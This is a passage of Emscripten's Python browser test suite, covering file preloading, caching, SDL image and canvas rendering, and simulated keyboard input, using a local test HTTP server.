source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_browser.py | # coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
